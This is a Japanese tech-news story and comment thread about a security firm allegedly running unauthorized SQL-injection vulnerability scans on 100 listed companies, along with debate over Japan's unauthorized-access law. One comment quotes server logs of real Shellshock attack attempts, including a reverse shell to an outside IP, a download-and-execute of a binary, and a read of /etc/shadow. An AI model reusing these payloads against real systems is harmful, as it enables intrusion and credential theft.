とあるセキュリティ企業、上場企業100社に対し無断で攻撃を行っていた? 41
ストーリー by hylom
続報はないのだろうか 部門より
続報はないのだろうか 部門より
あるAnonymous Coward 曰く、
セキュリティ関連ビジネスを手がけるsproutが、上場企業100社に対し無断で攻撃を行っていたのではないかという疑惑が出ている。
発端は雑誌「FACTA」の2014年11月号掲載記事『上場企業5割に「サイバー脆弱性」』。会員限定の記事なので本文全文は閲覧できないが、sproutの公式Twitterによると、「本日発売の経済誌FACTAに、スプラウトが行った上場企業100社のサイバー脆弱性調査が掲載されました。」とのことで、sprout社が上場企業100社に対し、無断で「サイバー脆弱性調査」を行ったようだ。
しかし、脆弱性調査を行う場合、通常は調査対象の同意や事前の調整・準備が必要となる。調査を行うためには攻撃を行う必要があり、それによってデータの消失や改変などの被害が発生する可能性があるからだ(過去記事)。そのため、相手に無断で調査を行った場合、その内容によっては不正アクセス禁止法に抵触する可能性がある。
これに対し、早速セキュリティ研究家の高木浩光氏が「「危険度 高 脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか」とツッコミを入れている。
スプラウトさんはTwitterを使っています: (スコア:4, おもしろおかしい)
https://twitter.com/sprout_group [twitter.com]
インターネット・セキュリティ事件を呟きます
だそうで。
呟いたんですね。インターネット・セキュリティ事件を。自社だけど。マッチポンプだけど。
簡単に調査できるからこそ (スコア:2)
そういった方面の意識が低すぎるのかも。
込み入った調査なんかは実際にシステムを把握したうえでやらないといけないけど
ツールなんかで表面をさらうだけならサクっと出来ちゃうからやっちゃったのかな。
# 既知のセキュリティーホールが残ってる程度の報告ならまだしもそうじゃないっぽいし
ShellShockスキャナは結構来ていた (スコア:2, 興味深い)
自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
>c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
>202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
>109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]
>83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\""
>217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
>125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"
こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね?
うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。
情報開示請求でも出して告発した方がいいんでしょうか?
Re: (スコア:0)
抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
Re:ShellShockスキャナは結構来ていた (スコア:1)
不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。
Re: (スコア:0)
スキャン成功してるの?
成功しなければ未遂なので抵触はしないですよ。
もちろん道徳的に未遂が許されるわけではないですが。
リテラシィ研究科に煽り入れてもらえみたいな (スコア:1)
御社のポリシーどうなってんの?
と某掲示板並に容赦なく煽り入れてもらえば
自分らがなにしたのか
理解できるようになるんではないのかな
# ハムラビメソッド横レス編
まだ決まったわけじゃない (スコア:1)
SQLインジェクションの脆弱性があるかの確認方法は、必ずしも不正アクセス禁止法違反を犯さないとできないわけではありません。不正アクセス禁止法違反を犯さない方法でアクセスして、画面の表示を見て「疑わしい」場合を見つけることができる時もあります。ただし、その方法では、あくまでも疑わしいというだけで、脆弱性があることを証明できたわけではありません。しかし、FACTA誌は、危険度高の脆弱性があると断言して特定の企業の信頼を貶めるような文体の記事を出して来ています。
つまり次のどちらかということになるかと。
A. 不正アクセス禁止法違反の方法で脆弱性を確実に突き止めたので、FACTA誌の記事の内容は事実として正しい。
B. 不正アクセス禁止法違反でない方法で脆弱性が存在する可能性を大まかに推定したものなので、FACTA誌の記事は事実でない可能性のあることを事実として報じたもので、名誉毀損や信用毀損に当たるおそれがある。
行えますよ (スコア:0)
>「危険度 高 脆弱性の種類 SQLインジェクション」のテストは不正アクセス禁止法に抵触しない方法で行なえたのですか
双方が合意・締結し正規の依頼に則れば合法ですが。
# まさか無断で合法に不正アクセスする方法を聞いてはいないよね?
Re: (スコア:0)
ハア?無断が前提の話でしょ?
Re: (スコア:0)
法律も完璧じゃないから、無断で合法な悪意のあるアクセスが出来る場合もあるよってのが元コメでしょ。まさかでもなく聞いてもいない。
Re: (スコア:0)
仮にその「疑わしい」程度の確認で「脆弱性」と発表するのが信じられません。
単に脆弱性のあるバージョンのビルド番号が返ってきたからといって、そのサーバーが脆弱であるとは限らないでしょう?
勝手に脆弱と決めつけるくせに、「疑わしい」と主観で判断したのが根拠だとしたら、それこそ大問題です。
Re: (スコア:0)
ちなみに、FACTAの独断とするならスプラウト某がしっかり否定しないとダメでしょう。
Re: (スコア:0)
ユーザー名やパスワードに引用符を入れるとPHP Warning: mysql_~とか出てきちゃうサイトが沢山あったのかも知れない。
引用符がエスケープされてないなら、不正ログインを行うクエリも作れるでしょう。
不思議はない (スコア:0, 荒らし)
暴走族あがりが白バイ乗ってるのとおなじで
セキュリティ関連ビジネスなんてクラッカーあがりがやる仕事でしょ。
っていうか (スコア:0)
余計なお世話。
ありがた迷惑。
少なくとも「無駄なトラフィックを勝手に作った」ことを反省して欲しい。
Re:っていうか (スコア:1)
×無駄なトラフィックを勝手に作った
○無駄な仕事を勝手に作った
攻撃を受けた会社は、影響調査やんなきゃなんないからね。
攻撃の種類が不明瞭だから、あらゆる攻撃を想定して調査しなきゃならない。
すっげぇー面倒だよ。
Re: (スコア:0)
「違法行為」は「迷惑」の大まかにサブセットだから別にいいじゃん
迷惑の中でも特に迷惑だから違法なのさ
SQLインジェクションのテストが駄目なら (スコア:0)
パラメータに半角のシングルクオートを含めるのは、SQLインジェクションの可能性を発見できてしまう可能性があるから、全部違法なの?
Re:SQLインジェクションのテストが駄目なら (スコア:4, 興味深い)
不正アクセス禁止法の対象は故意犯で、過失は含まれない。
今回の件は意図して(アタック先にSQLインジェクション脆弱性があり、それを引き起こす可能性があることを前提とした上で)アタックしているので故意。事前にアタック先と調整していないので、「業務その他正当な理由による場合」による除外対象となるかも微妙。
…というところですかね。
Re: (スコア:0)
不正アクセス行為の禁止等に関する法律 二条四項を見る限り。
自身の識別符号(ID)を入力した上で構文状のパスワードを入力する体裁のSQLインジェクション脆弱性検査であれば、
法の要求する用件を満たさないため犯罪にならないような。
Re:SQLインジェクションのテストが駄目なら (スコア:2)
セキュリティホールへの攻撃等として不正アクセス禁止法 第2条第4項第2号が規定しているのは
「特定利用の制限を免れることができる情報(識別符号であるものを除く。)又は指令を入力して――」
ですね。
この前者については、送信したデータの中に「識別符号」が含まれていたとしても、データ全体から「識別符号」やその他の攻撃に無関係な情報(通常のHTTPヘッダやPOSTデータ)を除いた部分が、「特定利用の制限を免れることができる情報」として扱われるんじゃないでしょうか。
また、後者の「特定利用の制限を免れることができる指令」については、「識別符号であるものを除く」という規定はありませんから、「指令」の動作として必要であれば、「識別符号」も含めて「指令」とすることに問題はないでしょう。
「指令」の動作に必要ないのであれば、前者同様に、攻撃に無関係な情報として切り分けられるように思います。
ところで、SQLインジェクションなら、SQL構文自体が動作を規定するものだから、「指令」の方に当たるように感じます。
Re: (スコア:0)
こっちはどうなんでしょう?
Re: (スコア:0)
そっちはウイルスを送りつけて、先方に実行させようとする場合です。
脆弱性検査ではそういうことはしないですね。
Re:SQLインジェクションのテストが駄目なら (スコア:1)
子供か。常識で考えるか、きちんと法律の勉強をするか、どちらかをしろ。どちらでも答えは出るぞ。
Re: (スコア:0)
常識に反する法律なんていっぱいあるので、
キチンと法律を勉強しないとだめなんですよね。。。
Re: (スコア:0)
常識が移ろいゆくものだという常識もお忘れなく
非常識を裁くのには常識だけじゃ不足するので
法に纏わる文は難解だったり
世間の非常識な意味だったりするんです
法に長けた方ほど世間知らずだったりするものなのですよ
# 正義とは悪を収穫する営みである
Re: (スコア:0)
ということにしたいのですね
Re: (スコア:0)
SQLの内容によっては電子計算機損壊等業務妨害罪に問われることもあるかと
Re: (スコア:0)
でもどうだろう。
やる側は壊す目的はないはずで、やはり脆弱なシステムを作った側の責任も大きいと思うけどなぁ。
ブレーキ壊れた自動車を試乗させて、事故させて、壊したから金払え、って言ってるような。
ブレーキ壊れてるかは踏まないとわからない。
もし自分が大切な情報を預けるサービスなら、そういうとこきっちりやってもらいたいし、事前に調べる、っていうもあってもいいのかもしれない。
まぁ現行法ではアウトなんだろうけど、その辺もまだ法律がネットに追いついてない気がするなぁ。
Re: (スコア:0)
関連リンクにあるが
パスワードリセット画面のメールアドレス欄に入力したアドレスに、誤って「+」が入っていたために全ユーザのパスワードリセットが動いたそうな。
故意にやれば、器物損壊や威力業務妨害にあたると思われる。
タレコミにある不正アクセス禁止法というのは、インジェクションにより、アクセス制限を回避した場合かな。
Re: (スコア:0)
「村田 巨人」で検索するとバグるサイトもあったりしますから、過失でも違法だったら何も出来ませんね
無断でやったという根拠は? (スコア:0)
> 無断で「サイバー脆弱性調査」を行ったようだ。
事前に許可を得たという話も聞こえてこないが、得ていないという話も聞こえてこない。
Re:無断でやったという根拠は? (スコア:1)
FACTA誌の記事を読むと、無断のようですね。事後に通告して、記事書くまでにどういう返事が来たか、来なかったかを記事にしてる。
Re:無断でやったという根拠は? (スコア:1)
上場上位100社全社の許可を得れたスプラウトマジっぱねぇ!
こうですか><
Re: (スコア:0)
上位100社なんでしたっけ?
Re: (スコア:0)
あっ!?
とおもた。かんちがいしてた。
QUERY STRINGってなんでもありでは (スコア:0)
GETでURLについてる値やPOSTでformタグの中に書かれてるようなものなんて、クライアント側でいくらでも書き換えが可能であり、
サーバー側はどんな値が来ても対処できるような作りにしておくべきなのは絶対的な鉄則。
それがSQLに作用する文字列だろうがなんだろうが、受け手側の問題であり、送信者側を責めるのはおかしいと思うけどなぁ。
もし、どうしてもサービス側が指定したものしか入力させたくないというなら、最初からサービス側が選択肢を用意して、サーバーには数値しか送れないようにしておくべきでは。文字列も全て選択肢にするか、「あ」を1、「い」を2みたいにするとか。
それが嫌ならもうQUERY STRING書き換えも違法、とでもすればいいよ。
通常のアクセスだろうが調査目的のアクセスだろうが、無駄に大量アクセスして過大な負荷をかけるのは別の話(違法でいい)。
俺達は試されている (スコア:0)
FACTAのログインフォームが、どうも俺達を試しているような気がするんだ。
き、君が、た、試してみてくれ。
Re: (スコア:0)
呼び鈴がついてるからってピンポンダッシュしてもいいってもんじゃないでしょ。